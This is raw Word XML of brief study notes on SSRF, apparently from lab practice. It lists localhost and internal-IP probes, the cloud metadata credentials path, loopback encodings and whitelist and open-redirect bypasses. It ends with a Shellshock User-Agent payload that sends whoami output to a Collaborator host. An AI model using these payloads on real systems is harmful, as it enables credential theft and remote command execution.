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C2C2A" w14:textId="7AA0511B" w:rsidR="0082346F" w:rsidRDefault="00353082" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A277F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSRF:</w:t>
      </w:r>
      <w:r w:rsidRPr="00353082">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00353082">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>induce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00353082">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the server-side application to make requests to an unintended </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">internal-only </w:t>
      </w:r>
      <w:r w:rsidR="006A277F">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">location </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or external</w:t>
      </w:r>
      <w:r w:rsidR="006A277F">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for leaking sensitive data) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A234E1D" w14:textId="25315F46" w:rsidR="006A277F" w:rsidRDefault="006A277F" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23899047" w14:textId="226E8157" w:rsidR="00442218" w:rsidRDefault="00B9783E" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Find all</w:t>
      </w:r>
      <w:r w:rsidR="006A277F">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL-Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> find “http”</w:t>
      </w:r>
      <w:r w:rsidR="006A277F">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972F5D3" w14:textId="2AFF5AA4" w:rsidR="006A277F" w:rsidRDefault="00E4239C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007B4EEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://localhost/admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54799DF0" w14:textId="29810F2E" w:rsidR="00442218" w:rsidRDefault="00E4239C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="007B4EEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.0.1-255:</w:t>
        </w:r>
        <w:r w:rsidRPr="007B4EEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>8080</w:t>
        </w:r>
        <w:r w:rsidRPr="007B4EEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28802792" w14:textId="04FDBBB9" w:rsidR="005F4849" w:rsidRPr="0046259E" w:rsidRDefault="0046259E" w:rsidP="005F4849">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0046259E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/latest/meta-data/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046259E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046259E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/security-credentials/admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D91F1A" w14:textId="77777777" w:rsidR="005F4849" w:rsidRPr="005F4849" w:rsidRDefault="005F4849" w:rsidP="005F484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/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Using an alternative IP representation of </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>2130706433</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>017700000001</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>, or </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>127.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A5072" w14:textId="43EB5DA9" w:rsidR="005F4849" w:rsidRDefault="005F4849" w:rsidP="005F484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/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>(double)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> of “admin”</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4849">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> or case variation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392EE70E" w14:textId="354FA6DD" w:rsidR="00E4239C" w:rsidRDefault="00E4239C" w:rsidP="00E4239C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">- circumvent white-list </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:anchor="@vulnerable-website.net/admin" w:history="1">
        <w:r w:rsidRPr="007B4EEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US" w:eastAsia="de-DE"/>
          </w:rPr>
          <w:t>http://localhost#@vulnerable-website.net/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>, (double) encode the #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC13CAF" w14:textId="13448D85" w:rsidR="00B9783E" w:rsidRDefault="00B9783E" w:rsidP="00E4239C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">- using open redirect: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9783E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>openRedirectURL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9783E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>newP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9783E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>ath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B9783E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=http://192.168.0.12:8080/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D6991" w14:textId="47ADBC42" w:rsidR="00B9783E" w:rsidRDefault="00B9783E" w:rsidP="00E4239C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9783E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Blind SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>: response from the back-end request is not returned to the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C108E" w14:textId="23FA7081" w:rsidR="00B9783E" w:rsidRDefault="00B9783E" w:rsidP="002A16E9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Use Burp Collaborator Client to host a server: if the test system sends DNS/HTTP-Request to Burp Collaborator Client -&gt; vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F756CB" w14:textId="15B90F7D" w:rsidR="002A16E9" w:rsidRPr="0046259E" w:rsidRDefault="002A16E9" w:rsidP="002A16E9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046259E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">- change URL in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0046259E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0046259E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A186C6" w14:textId="25CB7131" w:rsidR="00403B60" w:rsidRPr="00403B60" w:rsidRDefault="00403B60" w:rsidP="002A16E9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">- read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00403B60">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US" w:eastAsia="de-DE"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73F99167" w14:textId="4CE34A2D" w:rsidR="00403B60" w:rsidRPr="0046259E" w:rsidRDefault="00403B60" w:rsidP="002A16E9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://192.168.0.1-255:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C921DC7" w14:textId="7641019E" w:rsidR="00B9783E" w:rsidRPr="005F4849" w:rsidRDefault="00403B60" w:rsidP="00B9783E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>User-Agent: () { :; }; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00403B60">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>).BURP-COLLABORATOR-SUBDOMAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD23CF1" w14:textId="77777777" w:rsidR="005F4849" w:rsidRPr="00403B60" w:rsidRDefault="005F4849" w:rsidP="005F4849">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
